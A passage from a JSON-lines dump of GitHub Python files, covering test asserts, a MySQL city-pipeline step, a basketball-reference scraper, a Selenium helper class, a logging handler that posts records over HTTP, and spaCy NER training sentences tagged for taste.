3), (3, 3)]\n print(\"combinationswithrepeats function - OK\")\n\n assert unorderedpartitions(1) == [(1,)]\n assert unorderedpartitions(3) == [(1, 1, 1), (1, 2), (3,)]\n assert unorderedpartitions(5) == [(1, 1, 1, 1, 1), (1, 1, 1, 2), (1, 1, 3),\n (1, 2, 2), (1, 4), (2, 3), (5,)]\n print(\"unorderedpartitions function - OK\")\n\n assert correctbracketsequences(1) == ['()']\n assert correctbracketsequences(2) == ['(())', '()()']\n assert correctbracketsequences(3) == ['((()))', '(()())', '(())()',\n '()(())', '()()()']\n print(\"correctbracketsequences function - OK\")\n","repo_name":"dnemirich/python_course","sub_path":"Task5.py","file_name":"Task5.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23079816606","text":"#!/usr/local/bin/python3\n# -*- coding:utf-8 -*-\n\nfrom city.config import base_path,OpCity_config,config\nfrom collections import defaultdict\nimport json\nimport traceback\nimport sys\nimport pymysql\npymysql.install_as_MySQLdb()\nimport csv\nimport pymongo\nfrom city.config import config\nfrom city.insert_daodao_city import daodao_city\nfrom city.insert_hotel_city import hotel_city\nfrom city.insert_qyer_city import qyer_city\nfrom my_logger import get_logger\nfrom call_city_project.step_status import modify_status\n\nparam = sys.argv[1]\npath = ''.join([base_path, str(param), '/'])\nlogger = get_logger('step5', path)\n\ndef update_step_report(csv_path,param,step_front,step_after):\n conn = pymysql.connect(**OpCity_config)\n cursor = conn.cursor()\n update_sql_front = \"update city_order set report5=%s,step5=%s where id=%s\"\n update_sql_after = \"update city_order set step6=%s where id=%s\"\n update_sql_later = \"update city_order set step7=%s where id=%s\"\n try:\n cursor.execute(update_sql_front,(csv_path,step_front,param))\n cursor.execute(update_sql_after,(step_after,param))\n cursor.execute(update_sql_later,(step_after,param))\n conn.commit()\n except Exception as e:\n conn.rollback()\n finally:\n conn.close()\n#\n# def monitor_daodao(collection):\n# result = collection.find({'finished': 0})\n# not_finish_num = result.count()\n# total_num = collection.find({})\n# return not_finish_num / total_num\n# def monitor_qyer(collection):\n# result = collection.find({'finished': 0})\n# not_finish_num = result.count()\n# total_num = collection.find({})\n# return not_finish_num / total_num\n# def monitor_hotel(collections):\n# save_result = []\n# for collection in collections:\n# result = collection.find({'finished': 0})\n# not_finish_num = result.count()\n# total_num = collection.find({})\n# save_result.append(not_finish_num / total_num)\n# return max(save_result)\n#\n# def monitor_daodao_qyer_hotel(daodao_collection_name,qyer_collection_name,hotel_collections_name,param):\n# client = pymongo.MongoClient(host='10.10.231.105')\n# daodao_collection = client['MongoTask'][daodao_collection_name]\n# qyer_collection = client['MongoTask'][qyer_collection_name]\n# hotel_collections = []\n# for collection in hotel_collections_name:\n# hotel_collections.append(client['MongoTask'][collection])\n#\n# conn = pymysql.connect(**OpCity_config)\n# cursor = conn.cursor()\n# select_sql = \"select step5 from city_order where id=%s\"\n# cursor.execute(select_sql)\n# status_id = cursor.fetchone()[0]\n# if int(status_id) == 2:\n#\n# daodao_not_finish = monitor_daodao(daodao_collection)\n# qyer_not_finish = monitor_qyer(qyer_collection)\n# hotel_not_finish = monitor_hotel(hotel_collections)\n#\n# if not daodao_not_finish and not qyer_not_finish and not hotel_not_finish:\n# job = backgroudscheduler.get_job('step5')\n# job.remove()\n# update_step_report('', param, 1, 0)\n\n\ndef task_start():\n logger.info('[step5][%s]======== start =======' % (param,))\n try:\n sources = ['agoda', 'ctrip', 'elong', 'hotels', 'expedia', 'booking']\n return_result = defaultdict(dict)\n return_result['data'] = {}\n return_result['error']['error_id'] = 0\n return_result['error']['error_str'] = ''\n save_cityId = []\n database_name = ''.join(['add_city_', param])\n temp_config = config\n temp_config['db'] = database_name\n path = ''.join([base_path, param, '/', 'city_id.csv'])\n with open(path, 'r+') as city:\n reader = csv.DictReader(city)\n for row in reader:\n save_cityId.append(row['city_id'])\n logger.info('[step5][%s, %s, %s] 启动发 daodao 任务' % (save_cityId, param, temp_config))\n daodao_collection_name,daodao_task_name = daodao_city(save_cityId,param, temp_config)\n logger.info('[step5] 发 daodao 任务完成 [%s, %s]' % (daodao_collection_name, daodao_task_name))\n logger.info('[step5][%s, %s, %s] 启动发 qyer 任务' % (save_cityId, param, temp_config))\n qyer_collection_name,qyer_task_name = qyer_city(save_cityId,param, temp_config)\n logger.info('[step5] 发 qyer 任务完成 [%s, %s]' % (qyer_collection_name, qyer_task_name))\n logger.info('[step5][%s, %s, %s] 启动发 hotel 任务' % (save_cityId, param, temp_config))\n hotel_collections_name = hotel_city(save_cityId, param, sources, temp_config)\n logger.info('[step5] 发 hotel 任务完成 [%s]' % (hotel_collections_name))\n\n save_collection_names = []\n for collection_name in hotel_collections_name:\n save_collection_names.append(collection_name)\n save_collection_names.append((daodao_collection_name, daodao_task_name))\n save_collection_names.append((qyer_collection_name, qyer_task_name))\n\n tasks = modify_status('step5', param, save_collection_names)\n\n logger.info('[step5] 发 hotel 任务完成 [%s]' % (tasks))\n\n return_result = json.dumps(return_result)\n logger.info('[step5][%s]======== successed ======= \\n%s' % (param, return_result))\n\n except Exception as e:\n return_result['error']['error_id'] = 1\n return_result['error']['error_str'] = traceback.format_exc()\n return_result = json.dumps(return_result)\n update_step_report('', param, -1, 0)\n logger.info('[step5] [result][{0}]'.format(return_result))\n\n\n\nif __name__ == \"__main__\":\n task_start()","repo_name":"20113261/p_m","sub_path":"call_city_project/city_step_five.py","file_name":"city_step_five.py","file_ext":"py","file_size_in_byte":5583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37374231817","text":"# %pip install bs4\n# %pip install html5lib\n\nfrom bs4 import *\nfrom bs4.element import PageElement\nimport time\nimport requests\nimport re\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm, trange\nimport json\nimport pickle\nfrom pathlib import Path\n\nHOME_PAGE = 'https://www.basketball-reference.com'\nSEASONS_PAGE = 'https://www.basketball-reference.com/leagues'\nTEAMS_PAGE = 'https://www.basketball-reference.com/teams'\nBOXSCORES_PAGE = 'https://www.basketball-reference.com/boxscores'\n\ndef fetch_html(url,source=None):\n if source:\n try:\n data = load(url)\n return re.sub(\"\",\"\\n\",data)\n except:\n print(f'Failed to fetch {url} from local. Please try to fetch online instead')\n return None\n else:\n try:\n if not url.startswith(\"https://\"):\n url = \"https://\"+url\n session = requests.Session()\n return re.sub(\"\",\"\\n\",session.get(url).text)\n except:\n print(f'Failed to fetch {url} from web. Please double check url.')\n return None\n\ndef make_soup(text):\n return BeautifulSoup(text,features='html.parser')\n\ndef save(a,filepath,mode='w',file_type=None):\n if not Path(filepath).exists():\n Path(filepath).parent.mkdir(parents=True,exist_ok=True)\n if file_type is None:\n with open(filepath,mode) as f:\n f.write(a)\n elif file_type.endswith('json'):\n with open(filepath,mode) as f:\n json.dump(a,f)\n elif file_type.endswith('pkl'):\n with open(filepath,mode) as f:\n pickle.dump(a,f) \n\ndef load(filepath,mode='r',file_type=None):\n if file_type is None:\n with open(filepath,mode) as f:\n data = f.read()\n elif file_type.endswith('json'):\n with open(filepath,mode) as f:\n data = json.load(f)\n elif file_type.endswith('pkl'):\n with open(filepath,mode) as f:\n data = pickle.load(f) \n return data\n\n\ndef fetch_seasons_hrefs(save_to=None,from_local=False):\n # fetch leagues page\n url = SEASONS_PAGE\n html_text = fetch_html(url,from_local)\n html_soup = make_soup(html_text)\n seasons_list = [a['href'] for th in html_soup.find_all('th', {'data-stat': 'season'}) for a in th.find_all('a')]\n if save_to:\n save_url = f\"{save_to}{url}\" if url.endswith('.html') else f\"{save_to}{url}.html\"\n save(html_text,save_url)\n return seasons_list\n\ndef fetch_season_boxscores_hrefs(season_href,save_to=None,from_local=False,sleep=0):\n # Load and save season schedule page\n # Check for filters. If so iterate through each filter to get the entire list. Else use the schedule on the current page\n url = f\"{HOME_PAGE}{season_href.strip('.html')}_games.html\"\n html_text = fetch_html(url,from_local)\n if html_text is None:\n return\n if save_to:\n save_url = f\"{save_to}{url}\" if url.endswith('.html') else f\"{save_to}{url}.html\"\n save(html_text,save_url)\n \n html_soup = make_soup(html_text)\n season_boxscores_hrefs = []\n filter_div = html_soup.find('div',{'class':'filter'}) \n schedule_table = html_soup.find('table', {'id': 'schedule'})\n \n if filter_div is None:\n season_boxscores_hrefs = [a['href'] for th in schedule_table.find_all('td',{'data-stat':'box_score_text'}) for a in th]\n \n # If so iterate through each filter to get the entire list\n else: \n month_hrefs = [a['href'] for a in filter_div.select('a')]\n for month_href in month_hrefs:\n url = f'{HOME_PAGE}{month_href}'\n html_text = fetch_html(url,from_local)\n if html_text is None:\n continue\n if save_to:\n save_url = f\"{save_to}{url}\" if url.endswith('.html') else f\"{save_to}{url}.html\"\n save(html_text,save_url)\n\n html_soup = make_soup(html_text)\n schedule_table = html_soup.find('table', {'id': 'schedule'})\n season_boxscores_hrefs += [a['href'] for th in schedule_table.find_all('td',{'data-stat':'box_score_text'}) for a in th]\n if sleep:\n time.sleep(sleep)\n return season_boxscores_hrefs\n\ndef fetch_match_boxscores(boxscore_href,save_to=None,from_local=None, sleep=0, content_only=True):\n url = f\"{HOME_PAGE}{boxscore_href}\"\n html_text = fetch_html(url,from_local)\n html_soup = make_soup(html_text)\n box_scores_hrefs = []\n filter_div = html_soup.find('div',{'class':'filter'})\n if filter_div is not None:\n filter_hrefs = [a['href'] for a in filter_div.select('a')]\n for filter_href in filter_hrefs:\n url = f'{HOME_PAGE}{filter_href}'\n html_text = fetch_html(url,from_local)\n if html_text is None:\n continue\n if content_only:\n html_text = str(make_soup(html_text).find('div',{'id':'content'}))\n if save_to:\n save_url = f\"{save_to}{url}\" if url.endswith('.html') else f\"{save_to}{url}.html\"\n save(html_text,save_url)\n if sleep:\n time.sleep(sleep)\n box_scores_hrefs.append(filter_href)\n\n else:\n url = f'{HOME_PAGE}{boxscore_href}'\n html_text = fetch_html(url,from_local)\n if html_text is None:\n pass\n else:\n if save_to:\n save_url = f\"{save_to}{url}\" if url.endswith('.html') else f\"{save_to}{url}.html\"\n save(html_text,save_url)\n box_scores_hrefs.append(boxscore_href)\n return box_scores_hrefs\n\n\n\nif __name__ == \"__main__\":\n LOCAL_HOST = '/Volumes/Seagate Portable Disk/University of Manitoba/Data Science/Datasets/basketball-analytics/'\n checkpoint_path = f'{LOCAL_HOST}/checkpoint.pkl'\n # fetch seasons\n if Path(checkpoint_path).exists():\n i_chkpt,j_chkpt = load(checkpoint_path,mode='rb',file_type='.pkl')\n print(f'Resume from checkpoint = {i_chkpt,j_chkpt}')\n else:\n i_chkpt,j_chkpt = 0,0\n\n seasons_hrefs = fetch_seasons_hrefs(save_to=LOCAL_HOST,from_local=False)\n seasons_hrefs = tqdm(seasons_hrefs,position=0)\n for i,seasons_href in enumerate(seasons_hrefs):\n if i < i_chkpt: \n continue\n # fetch season boxscores list\n seasons_hrefs.set_description(seasons_href)\n season_boxscores_hrefs = fetch_season_boxscores_hrefs(seasons_href,save_to=LOCAL_HOST,from_local=False, sleep=3)\n season_boxscores_hrefs = tqdm(season_boxscores_hrefs,position=1, leave=False)\n for j,season_boxscores_href in enumerate(season_boxscores_hrefs):\n if (i == i_chkpt) and (j < j_chkpt): \n continue\n season_boxscores_hrefs.set_description(season_boxscores_href)\n # fetch match box scores\n match_boxscores = fetch_match_boxscores(season_boxscores_href,save_to=LOCAL_HOST,from_local=False, content_only = True,sleep=4)\n save((i,j),checkpoint_path,mode='wb',file_type='.pkl')\n \n\n# source /Users/jasetran/Jase/UM/Git/basketball-analytics/.venv/bin/activate\n# /Users/jasetran/Jase/UM/Git/basketball-analytics/.venv/bin/python /Users/jasetran/Jase/UM/Git/basketball-analytics/code/v5/scripts/scrape.py\n","repo_name":"tranndt/basketball-analytics","sub_path":"code/v5/scripts/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":7235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42131163301","text":"from flask import Flask, request\nimport json\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n heim = request.args.get('heim')\n gast = request.args.get('gast')\n\n res=[heim, gast]\n res_a = {\"a\": res, \"b\": res}\n return json.dumps(res_a)","repo_name":"tipsky-club/tipsky","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29510869654","text":"from __future__ import annotations\n\nfrom logging import Logger\nfrom time import sleep\n\nimport pyperclip\nfrom selenium.common import TimeoutException\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\nclass Element(object):\n \"\"\"\n 页面元素类\n\n 元素定位默认使用`xpath`, 显示等待超时时间默认 5s\n \"\"\"\n\n def __init__(self, driver: WebDriver, log: Logger, sleep_debug: float = 0) -> None:\n \"\"\"\n 初始化方法\n\n :param driver: 浏览器驱动对象\n :param log: 日志对象\n :param sleep_debug: 全局的调试时间, 默认0s\n \"\"\"\n self.driver = driver\n self.log = log\n self.sleep_debug = sleep_debug\n\n def get_url(self, url: str) -> None:\n \"\"\"\n 跳转到指定的`url`\n\n :param url: url路径\n :return:\n \"\"\"\n try:\n self.driver.get(url)\n except TimeoutException:\n msg = \"加载页面超时! 页面url: \" + url\n self.log.error(msg)\n raise TimeoutException(msg)\n\n def find_ele_visible(self, value: str, by: str = By.XPATH, timeout: float = 5) -> WebElement:\n \"\"\"\n 定位可见元素\n\n 增加显示等待定位元素, 也可以理解为: 等待元素可见. 状态变化: 元素从不可见到可见\n\n :param value: 定位字符串\n :param by: 定位方式, 默认使用`xpath`\n :param timeout: 显示等待的超时时间, 默认 5s\n :return: 在指定的时间内, 找到可见元素返回元素对象, 否者报超时错误\n \"\"\"\n try:\n ele: WebElement = WebDriverWait(self.driver, timeout=timeout).until(\n expected_conditions.visibility_of_element_located((by, value)))\n except TimeoutException:\n msg = \"未定位到可见元素 --> %s:%s\" % (by, value)\n self.log.error(msg)\n raise TimeoutException(msg)\n return ele\n\n def wait_ele_invisible(self, value: str, by: str = By.XPATH, timeout: float = 5) -> bool:\n \"\"\"\n 等待元素不可见\n\n 状态变化: 元素从可见到不可见\n\n :param value: 定位字符串\n :param by: 定位方式, 默认使用`xpath`\n :param timeout: 显示等待的超时时间, 默认 5s\n :return: 在指定的时间内, 元素从可见变成不可见返回 True, 否者报超时错误\n \"\"\"\n try:\n WebDriverWait(self.driver, timeout=timeout).until_not(\n expected_conditions.visibility_of_element_located((by, value)))\n except TimeoutException:\n msg = \"元素未消失 --> %s:%s\" % (by, value)\n self.log.error(msg)\n raise TimeoutException(msg)\n return True\n\n def click_ele(self, value: str, by: str = By.XPATH, timeout: float = 5) -> None:\n \"\"\"\n 点击可见元素\n\n :param value: 定位字符串\n :param by: 定位方式, 默认使用`xpath`\n :param timeout: 显示等待的超时时间, 默认 5s\n :return:\n \"\"\"\n ele = self.find_ele_visible(value=value, by=by, timeout=timeout)\n text = ele.text\n ele.click()\n self.ele_log(action=\"点击了元素\", text=text, by=by, value=value)\n sleep(self.sleep_debug)\n\n def jsclick_ele(self, value: str, by: str = By.XPATH, timeout: float = 5) -> None:\n \"\"\"\n js点击可见元素, 通常用于元素上有其他元素遮挡, 比如有弹窗消息之类的元素\n \"\"\"\n ele = self.find_ele_visible(value=value, by=by, timeout=timeout)\n text = ele.text\n self.driver.execute_script(\"arguments[0].click();\", ele)\n self.ele_log(action=\"js点击了元素\", text=text, by=by, value=value)\n sleep(self.sleep_debug)\n\n def input_text(self, value: str, text: str, by: str = By.XPATH, timeout: float = 5) -> None:\n \"\"\"\n 先清空输入框, 再输入数据\n \"\"\"\n ele = self.find_ele_visible(value=value, by=by, timeout=timeout)\n ele.clear()\n ele.send_keys(text)\n self.ele_log(action=\"输入了文本\", text=text, by=by, value=value)\n\n def get_paste(self) -> str:\n \"\"\"获取复制的内容\"\"\"\n return pyperclip.paste()\n\n def slide_scrollbar(self, x: int, y: int) -> None:\n \"\"\"\n 滑动滚动条\n x: 正整数--向左, 负整数--向右\n y: 正整数--向上, 负整数--向下\n \"\"\"\n self.driver.execute_script(\"window.scrollTo(\" + str(x) + \", \" + str(y) + \")\")\n\n def ele_log(self, action: str, by: str, value: str, text: str) -> None:\n \"\"\"\n 元素操作日志\n \"\"\"\n self.log.info(\"成功%s: %s --> %s:%s\", action, text, by, value)\n","repo_name":"huohuoren4/python-demo","sub_path":"auto-test/core/webui/element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17708962655","text":"import pandas as pd\r\n\r\ndef tostr(value):\r\n return str(value)\r\n\r\n\r\nintel_data = pd.read_csv('cpus_data/intel_data.csv')\r\nmediatek_data = pd.read_csv('cpus_data/mediatek_data.csv')\r\namd_data = pd.read_csv('cpus_data/amd_data.csv')\r\ndata = pd.read_csv('data.csv')\r\n\r\nframes = [intel_data, mediatek_data, amd_data]\r\nfeatures = pd.concat(frames)\r\nfeatures[\"Name\"] = features[\"Name\"].apply(tostr)\r\n\r\nunique_names = data.CPU.unique()\r\n\r\nfound = []\r\nfound_cpus = pd.DataFrame()\r\n\r\nfor name in unique_names:\r\n if name == \" \":\r\n continue\r\n for cpu in features['Name']:\r\n if name.lower() in cpu.lower():\r\n found.append(features[features['Name'] == cpu])\r\n\r\nnew_df = pd.concat(found)\r\nnew_df = new_df[[\"Name\",\"Cores\",\"Threads\",\"Base\",\"Turbo\"]]\r\n\r\nnew_df.to_csv(\"processor_data.csv\")","repo_name":"NAndrej/laptop-price-prediction","sub_path":"CPUs/fetch_cpu.py","file_name":"fetch_cpu.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1039078338","text":"import os\nimport re\nimport textwrap as tw\ndef filters(s):\n # Interview comments\n if s.startswith(\"TIME\") or s.startswith(\"INTERVIEW\"):\n return False\n # Interview comments\n if s.startswith(\"NB\"):\n return False\n # Short utterances can only be interruptions\n if len(s.split()) <= 2:\n return False\n # Empty utterances\n if re.findall(r'^\\s*$', s):\n return False\n if not s:\n return False\n return True\n\ndef parse(s):\n start = False\n speaker = False\n s = re.sub(r'\\[anon\\]', '**anon**', s)\n s = re.sub(r'\\(([^()]+)\\)|\\[([^\\[\\]]+)\\]', '', s)\n attempt = re.findall(r'(^[A-Z]+):(.*)', s)\n if attempt:\n speaker, s = attempt[0][0], attempt[0][1]\n # s = s[2:] if s[1] == ':' else s[3:]\n start = True\n s = re.sub(r'\\s{2,}', ' ', s)\n return s.strip(), start, speaker\n\nrel_path = re.sub(r'[^/]+$', '', os.getcwd())\nconv_path = os.path.join(rel_path, 'data/convData')\ntrain_path = os.path.join(rel_path, 'data/trainData')\nif not os.path.isdir(train_path):\n os.mkdir(train_path)\nfor process_file in os.listdir(conv_path):\n f = open(os.path.join(conv_path, process_file))\n # dest_file_path = \"conv\" + str(i)\n line = f.readline()\n dump = ''\n speakers = []\n utterance_dict = {}\n while(line == '\\n'):\n line = f.readline()\n while(line != '\\n'):\n speakers += [re.findall(r'[A-Z]+:', line)[0][:-1]]\n line = f.readline()\n while(line):\n s, start, speaker = parse(line)\n if filters(s):\n if(speaker):\n current_speaker = speaker\n \"\"\"\n between two sentences: put EOS tag if last character is a letter. Leave this otherwise.\n \"\"\"\n if current_speaker not in utterance_dict:\n utterance_dict[current_speaker] = s\n else:\n if start:\n # If starting now, then previous has finished; finish previous sentence\n # If prev had a punctuation mark at the end, leave it there. Else, mark EOS\n if utterance_dict[current_speaker].strip()[-1:] not in '-,.?!':\n utterance_dict[current_speaker] += ' EOS '\n else:\n utterance_dict[current_speaker] += ' '\n # Append new utterance to dataset\n utterance_dict[current_speaker] = utterance_dict[current_speaker] + s\n else:\n utterance_dict[current_speaker] = utterance_dict[current_speaker] + ' ' + s\n line = f.readline()\n for speaker in speakers:\n if speaker in utterance_dict:\n wrapped = '\\n'.join(tw.wrap(utterance_dict[speaker]))\n dest_file_path = \"conv_\" + '_'.join(speakers) + '@Speaker_' + speaker\n write_text_file = open(os.path.join(train_path, dest_file_path), \"w\")\n write_text_file.write(wrapped)\n write_text_file.close()\n","repo_name":"st-vincent1/fishWaffle","sub_path":"src/convBySpeakerParser.py","file_name":"convBySpeakerParser.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27145348149","text":"import linecache\nfrom threading import Thread\nimport sys\nfrom logging import Handler, Formatter\nfrom logging import CRITICAL, ERROR, WARNING, INFO, DEBUG, NOTSET\nimport time\n\ntry:\n from Queue import Queue\nexcept:\n from queue import Queue\nimport requests\nimport json\n\n_levelToName = {\n CRITICAL: 'FATAL',\n ERROR: 'ERROR',\n WARNING: 'WARN',\n INFO: 'INFO',\n DEBUG: 'DEBUG',\n NOTSET: 'TRACE',\n}\n\n\nclass LoggerJsonFormatter(Formatter):\n \"\"\"\n Format record in LoggerJson format\n \"\"\"\n\n def format(self, record):\n \"\"\"Formats LogRecord into python dictionary.\"\"\"\n # Standard document\n document = {\n 'timestamp': time.time() * 1000.0,\n 'level': _levelToName[record.levelno],\n 'thread': record.threadName,\n 'thread_id': record.thread,\n 'message': record.getMessage(),\n 'logger': record.name,\n 'location': {\n 'filename': record.pathname,\n 'class': record.module,\n 'method': record.funcName,\n 'line': record.lineno\n }\n }\n # Standard document decorated with exception info\n if record.exc_info is not None:\n document.update({\n 'throwable': {\n 'message': str(record.exc_info[1]),\n 'stack_trace': [\n {\n \"line\": stack[1],\n \"filename\": stack[0],\n \"method\": stack[2],\n \"line_code\": stack[3]\n }\n for stack in LoggerJsonFormatter.extract_tb(record.exc_info[2])\n ]\n }\n })\n return document\n\n @staticmethod\n def extract_tb(tb, limit=None):\n \"\"\"Return list of up to limit pre-processed entries from traceback.\n\n This is useful for alternate formatting of stack traces. If\n 'limit' is omitted or None, all entries are extracted. A\n pre-processed stack trace entry is a quadruple (filename, line\n number, function name, text) representing the information that is\n usually printed for a stack trace. The text is a string with\n leading and trailing whitespace stripped; if the source is not\n available it is None.\n \"\"\"\n if limit is None:\n if hasattr(sys, 'tracebacklimit'):\n limit = sys.tracebacklimit\n list = []\n n = 0\n while tb is not None and (limit is None or n < limit):\n f = tb.tb_frame\n lineno = tb.tb_lineno\n co = f.f_code\n filename = co.co_filename\n name = co.co_name\n linecache.checkcache(filename)\n line = linecache.getline(filename, lineno, f.f_globals)\n if line:\n line = line.strip()\n else:\n line = None\n list.append((filename, lineno, name, line))\n tb = tb.tb_next\n n = n + 1\n return list\n\n\nclass LofkaHandler(Handler):\n \"\"\"\n Log handler which sending\n \"\"\"\n\n def __init__(self, target_url, app_name=\"default_python_application\"):\n super(LofkaHandler, self).__init__()\n try:\n with open(\"lofka.json\", \"r\") as fp:\n obj = json.load(fp)\n target_url = obj['target_url']\n app_name = obj['app_name']\n except:\n pass\n self.target_url = target_url + \"lofka/service/push\"\n self.app_name = app_name\n self.formatter = LoggerJsonFormatter()\n\n def emit(self, record):\n \"\"\"\n Commit record to server\n :param record:\n :return:\n \"\"\"\n record_object = self.formatter.format(record)\n record_object[\"app_name\"] = self.app_name\n requests.post(self.target_url, data=json.dumps(record_object))\n\n\nclass LofkaAsyncHandler(Handler):\n \"\"\"\n Log handler which sending\n \"\"\"\n\n def __init__(self,\n target_url,\n app_name=\"default_python_application\",\n interval=1000,\n max_buffer_size=1000\n ):\n super(LofkaAsyncHandler, self).__init__()\n try:\n with open(\"lofka.json\", \"r\") as fp:\n obj = json.load(fp)\n target_url = obj['target_url']\n app_name = obj['app_name']\n interval = int(obj['interval'])\n max_buffer_size = int(obj['max_buffer_size'])\n except:\n pass\n self.target_url = target_url + \"lofka/service/push/batch\"\n self.app_name = app_name\n self.formatter = LoggerJsonFormatter()\n self.message_queue = Queue(int(max_buffer_size * 1.3)) # type: Queue\n self.max_buffer_size = max_buffer_size\n\n def push_data_periodically():\n while True:\n if self.message_queue.qsize() > 0:\n self.__submit_batch(list(self.message_queue.queue))\n self.message_queue.queue.clear()\n else:\n time.sleep(interval / 1000.0)\n\n Thread(target=push_data_periodically).start()\n\n def __submit_batch(self, data):\n \"\"\"\n Submit messages\n :type data: list\n :param data: messages\n :return:\n \"\"\"\n requests.post(self.target_url, data=json.dumps(data))\n\n def emit(self, record):\n \"\"\"\n Commit record to server\n :param record:\n :return:\n \"\"\"\n record_object = self.formatter.format(record)\n record_object[\"app_name\"] = self.app_name\n self.message_queue.put(record_object, timeout=1)\n if self.message_queue.qsize() > self.max_buffer_size:\n self.__submit_batch(list(self.message_queue.queue))\n self.message_queue.queue.clear()\n","repo_name":"TsingJyujing/lofka","sub_path":"lofka-python-utils/lofka/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"53"} +{"seq_id":"39477914082","text":"#!/usr/bin/env python\n# coding: utf8\n\"\"\"Example of training an additional entity type\nThis script shows how to add a new entity type to an existing pre-trained NER\nmodel. To keep the example short and simple, only four sentences are provided\nas examples. In practice, you'll need many more — a few hundred would be a\ngood start. You will also likely need to mix in examples of other entity\ntypes, which might be obtained by running the entity recognizer over unlabelled\nsentences, and adding their annotations to the training set.\nThe actual training is performed by looping over the examples, and calling\n`nlp.entity.update()`. The `update()` method steps through the words of the\ninput. At each word, it makes a prediction. It then consults the annotations\nprovided on the GoldParse instance, to see whether it was right. If it was\nwrong, it adjusts its weights so that the correct action will score higher\nnext time.\nAfter training your model, you can save it to a directory. We recommend\nwrapping models as Python packages, for ease of deployment.\nFor more details, see the documentation:\n* Training: https://spacy.io/usage/training\n* NER: https://spacy.io/usage/linguistic-features#named-entities\nCompatible with: spaCy v2.0.0+\n\"\"\"\nfrom __future__ import unicode_literals, print_function\n\nimport plac\nimport random\nfrom pathlib import Path\nimport spacy\n\n\n# new entity label\nLABEL = 'TASTE'\n\n# training data\n# Note: If you're using an existing model, make sure to mix in examples of\n# other entity types that spaCy correctly recognized before. Otherwise, your\n# model might learn the new type, but \"forget\" what it previously knew.\n# https://explosion.ai/blog/pseudo-rehearsal-catastrophic-forgetting\nTRAIN_DATA = [\n\n( u\"To be completely fair, the only redeeming factor was the food, which was above average, but couldn't make up for all the other deficiencies of Teodora.\" ,{'entities':[(73,89, u'TASTE' )]}),\n\n( u\"The food is uniformly exceptional, with a very capable kitchen which will proudly whip up whatever you feel like eating, whether it's on the menu or not.\" ,{'entities':[(12,33, u'TASTE' )]}),\n\n( u\"Not only was the food outstanding, but the little 'perks' were great.\" ,{'entities':[(22,33, u'TASTE' )]}),\n\n( u\"Not only was the food outstanding, but the little 'perks' were great.\" ,{'entities':[(63,68, u'TASTE' )]}),\n\n( u\"It is very overpriced and not very tasty.\" ,{'entities':[(26,40, u'TASTE' )]}),\n\n( u\"Our agreed favorite is the orrechiete with sausage and chicken (usually the waiters are kind enough to split the dish in half so you get to sample both meats).\" ,{'entities':[(11,19, u'TASTE' )]}),\n\n( u\"The Bagels have an outstanding taste with a terrific texture, both chewy yet not gummy.\" ,{'entities':[(19,30, u'TASTE' )]}),\n\n( u\"Nevertheless the food itself is pretty good.\" ,{'entities':[(32,43, u'TASTE' )]}),\n\n( u\"They did not have mayonnaise, forgot our toast, left out ingredients (ie cheese in an omelet), below hot temperatures and the bacon was so over cooked it crumbled on the plate when you touched it.\" ,{'entities':[(30,36, u'TASTE' )]}),\n\n( u\"The pizza is the best if you like thin crusted pizza.\" ,{'entities':[(17,21, u'TASTE' )]}),\n\n( u\"We were very disappointed.\" ,{'entities':[(13,25, u'TASTE' )]}),\n\n( u\"IT IS DEFINITELY SPECIAL AND AFFORDABLE.\" ,{'entities':[(17,24, u'TASTE' )]}),\n\n( u\"From the incredible food, to the warm atmosphere, to the friendly service, this downtown neighborhood spot doesn't miss a beat.\" ,{'entities':[(9,19, u'TASTE' )]}),\n\n( u\"Great food at REASONABLE prices, makes for an evening that can't be beat!\" ,{'entities':[(0,5, u'TASTE' )]}),\n\n( u\"The fried rice is amazing here.\" ,{'entities':[(18,25, u'TASTE' )]}),\n\n( u\"Three courses - choices include excellent mussels, puff pastry goat cheese and salad with a delicious dressing, and a hanger steak au poivre that is out of this world.\" ,{'entities':[(32,41, u'TASTE' ),(92,101, u'TASTE' )]}),\n\n( u\"it's a perfect place to have a amazing indian food.\" ,{'entities':[(12,33, u'TASTE' )]}),\n\n( u\"At the end you're left with a mild broth with noodles that you can slurp out of a cup.\" ,{'entities':[(30,34, u'TASTE' )]}),\n( u\"I just wonder how you can have such a delicious meal for such little money.\" ,{'entities':[(38,47, u'TASTE' )]}),\n\n( u\"The food was delicious but do not come here on a empty stomach.\" ,{'entities':[(13,22, u'TASTE' )]}),\n\n( u\"Ive been to many Thai restaurants in Manhattan before, and Toons is by far the best Thai food Ive had (except for my mom's of course).\" ,{'entities':[(79,83, u'TASTE' )]}),\n\n( u\"Nice atmosphere, the service was very pleasant and the desert was good.\" ,{'entities':[(66,70, u'TASTE' )]}),\n\n( u\"Fabulous service, fantastic food, and a chilled out atmosphere and environment.\" ,{'entities':[(18,27, u'TASTE' )]}),\n\n( u\"Great food, good size menu, great service and an unpretensious setting.\" ,{'entities':[(0,5, u'TASTE' )]}),\n\n( u\"The menu is limited but almost all of the dishes are excellent.\" ,{'entities':[(53,62, u'TASTE' )]}),\n\n( 